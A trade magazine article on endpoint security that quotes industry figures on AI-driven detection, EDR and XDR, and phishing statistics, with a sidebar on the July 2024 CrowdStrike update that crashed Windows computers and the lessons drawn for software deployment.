The question around who needs protection has shifted. Where the focus was once the perimeter, it quickly changed to the user and then, with the rise of remote work, wherever that user happened to be. It’s usually the end-user who is unintentionally facilitating a cyberattack – and it happens quickly. Verizon’s 2024 data breach investigations report found that the median time to click on a malicious link after the email is opened is 21 seconds, and then it takes only another 28 seconds to enter the data. That means it takes a user less than a minute to fall for a phishing email.
The good news is that AI is already being used by organisations to enhance threat detection. Instead of administrators manually running security tasks, much can be automated with AI algorithms and machine learning models. AI-driven endpoint security can block malicious activities before they cause harm, process large amounts of data to identify potential threats and adapt to emerging threats. This results in a more comprehensive and adaptive defence compared to traditional solutions, says Armand Kruger, head of cybersecurity at NEC XON.
While an adaptive endpoint security framework plays a key role in a business’ security posture, Shayimamba Conco, a workplace solutions architect at Check Point Software Technologies, says that by integrating AI and machine learning (ML) capabilities, an organisation’s systems will become more adaptive and efficient. If an endpoint security or antivirus solution detects signatures of known viruses and malware, for example, these can be blocked before being executed.
“While the coding of malware can be changed to get it past the solution undetected, its action remains the same,” says Gert Janzen, a product manager at Seacom. In the CIA (confidentiality, integrity and availability) triad – the three fundamental bases of information security – AI can help to safeguard the integrity and confidentiality of data by ensuring it’s kept intact and away from prying eyes. “[It] can also be used to reduce the number of false positives and reduce alert fatigue,” says Janzen.
“Most organisations have moved beyond antivirus software to comprehensive endpoint protection platforms,” he adds. “These offer preventive security for endpoints, while endpoint detection and response (EDR) solutions can provide realtime monitoring capabilities.”
Protection and detection
Sophos’ 2024 threat report shows that unprotected devices connected to organisations’ networks – including unmanaged computers without security software installed, improperly configured computers and systems running outdated software – are a primary point of entry for all types of cybercrime attacks on small businesses. EDR solutions provide organisations with comprehensive endpoint protection capabilities, including malware detection, ransomware prevention and endpoint hardening measures.
“Companies need to constantly monitor, measure and improve,” says Janzen. “If your endpoint is lost, if you cannot connect to your network, how do you get that data back?” EDR also enables threat-hunting activities. Security analysts can use EDR tools to search for indicators of compromise, investigate suspicious behaviour and preemptively neutralise threats before they escalate.
Visibility means rapid incident response
Traditional antivirus software is no longer sufficient in combatting the sophisticated tactics employed by modern cybercriminals. EDR solutions offer granular visibility into endpoint activities, allowing security teams to monitor processes such as file modifications, network connections and user behaviour in real-time. This visibility is essential for identifying anomalous behaviour indicative of a security breach.
“Organisations don’t know what they don’t know,” says Janzen. EDR solutions utilise advanced techniques such as behavioural analysis, machine learning and threat intelligence to detect previously unseen threats and zero-day attacks. In the event of a security incident, time is of the essence. EDR provides organisations with the capability to quickly investigate and respond to potential threats, minimising the impact of breaches and reducing dwell time — the duration between the occurrence and detection of a security incident. “There is no silver bullet for endpoint protection, so organisations need to have disaster recovery and incident response plans in place,” says Janzen.
With endpoint security, quick detection is critical. But it’s not only about preventing or mitigating cyber threats; many industries are subject to governance and compliance requirements around data protection and breach notification. With ransomware, rapid response times go hand-in-hand with meeting reporting requirements to avoid penalties. “You need an endpoint solution that will be able to prevent your data not only being encrypted, but also being stolen or infiltrated,” says Conco.
Complex threats
This is one of the reasons EDR is transitioning into XDR – extended detection and response. While EDR solutions provide granular visibility, XDR takes a broader approach. Data doesn’t only come in from endpoints, but also from networks, cloud services, email security systems and identity management solutions. By integrating data from these sources and layers, XDR can identify complex threats that might go unnoticed by standalone security tools. “EDR focuses on the endpoint, but businesses have data sitting in the cloud and other places. You need to ensure that all these are correlated into one platform,” says Conco. Although the entry point for attacks is often an endpoint, once a cybercriminal gains access, they will explore the network and exploit other vulnerable systems, elevate privileges and potentially gain access to critical data or systems, something that Conco likens to an onion. “XDR ensures that if ever one of the layers is bypassed by a threat actor, there will always be another layer in place.”
CROWDSTRIKE’S BLUE SCREEN OF DEATH AT THE ENDPOINT
On July 19, 2024, CrowdStrike, a provider of endpoint protection software, released an update that caused catastrophic failures on millions of Windows computers worldwide. The update, intended to enhance the security capabilities of its EDR software, instead triggered a series of blue screen errors due to a logic error in a newly deployed device driver. The incident serves as a cautionary tale in the field of endpoint security. Third-party endpoint protection solutions must deeply integrate with the operating system to perform their functions. This deep integration involves hooking into the operating system’s core processes and bypassing its security mechanisms. In the case of the CrowdStrike software update, a device driver was included that accessed memory locations incorrectly, leading to system crashes. Such drivers operate at a highly privileged level within the operating system, which can make any error catastrophic. While third-party endpoint protection software is designed to enhance security, it can also introduce new vulnerabilities. These solutions often rely on low-level programming languages like C and C++ to interact with the OS’ kernel. These languages are also prone to memory management errors, such as the Null Pointer Exception that caused the CrowdStrike crashes. And using undocumented or unsupported Windows APIs further complicates matters, as these interactions are less predictable and harder to secure. OS vendors, such as Microsoft, provide native security solutions like Windows Defender. These integrated solutions are safer because they are designed with intimate knowledge of the OS’ architecture. They don’t require the same level of deep system hooks as third-party solutions, reducing the risk of system instability and new vulnerabilities. Windows Defender, for example, is embedded within the Windows operating system and runs its security features without the need for device drivers.
The CrowdStrike incident highlights the importance of best practices in software deployment. Releasing critical updates late in the working week, as CrowdStrike did, leaves little time for addressing potential issues. “Avoiding this situation should have been straightforward,” said a Kaspersky blog. “First, the update shouldn’t have been released on a Friday. This is as per a rule that’s been known to all in the industry since the year dot: if an error occurs, there’s too little time to fix it before the weekend, so the system administrators at all companies affected need to work over the weekend to fix things.” Thorough testing and careful planning in update deployment is also an important step to avoid widespread disruptions. “It’s necessary to check software updates on test infrastructure for operability and errors before rolling them out to the company’s ‘combat’ infrastructure and to implement changes gradually – continually monitoring for possible failures,” added Kaspersky.
* Article first published on brainstorm.itweb.co.za
Share